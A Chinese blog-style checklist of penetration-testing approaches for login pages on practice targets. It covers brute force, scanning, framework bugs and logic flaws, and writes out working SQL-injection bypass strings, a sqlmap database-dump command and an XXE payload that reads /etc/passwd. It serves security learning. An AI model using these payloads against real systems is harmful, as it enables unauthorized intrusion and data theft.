0x00 前言
最近遇到几个靶机都是登录框,简单写下我的渗透思路吧~~
0x01 渗透思路
1、用户名枚举+爆破
用户名的查找,像工号可以尝试通过互联网搜索引擎去收集
爆破:burp+字典
2、万能密码
测试方法:
(1)用户名输入:‘ or 1=1 or ‘ 密码:任意
(2)Admin’ - -(或‘ or 1=1 or ‘ - -)(admin or 1=1 —) (MS SQL)(直接输入用户名,不进行密码验证)
(3)用户名输入:admin 密码输入:’ or ‘1’=’1 也可以
(4) 用户名输入:admin’ or ‘a’=‘a 密码输入:任意
(5) 用户名输入:‘ or 1=1 - -
(6) 用户名输入:admin‘ or 1=1 - - 密码输入:任意
(7) 用户名输入:1’or’1’=‘1’or’1’=’1 密码输入:任意
3、sql注入
工具测试方法:抓取请求包,用sqlmap扫
sqlmap -u ip --data "username=admin&password=admin" --thread 10 --batch --dbs
4、XXE
抓包查看账号密码是否以xml文件传输。
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Quan[
<!ENTITY admin SYSTEM "file:///etc/passwd">
]>
<root><name>&admin;</name><password>admin</password></root>
以及针对目录扫描、端口扫描等方式收集的信息的利用方法
5、目录扫描
-
目录遍历
-
敏感文件
eg:web.config.bak、www.rar、robots.txt
根据文件内容进行对应利用尝试、代码审计。
6、端口扫描
端口扫描得知使用了某个中间件、服务等,查找其相关漏洞。
-
常见危险端口服务
-
google搜索端口
-
查询相关漏洞poc
searchsploit
https://www.exploit-db.com/
7、未授权访问/越权
分析扫描、js文件中泄露的接口去尝试利用
工具:JSFinder、supersearch等
eg:/admin/admin.aspx
8、框架漏洞
根据页面报错/icon信息,或者端口扫描得知使用了某个中间件、框架、服务等,查找其相关漏洞。如tp、swagger、struts2、shiro。
- 常见框架报错页面
- 常见危险端口服务
9、逻辑漏洞
(1)任意用户注册
如尝试访问register.php等
(2)任意密码重置
(3)短信验证码绕过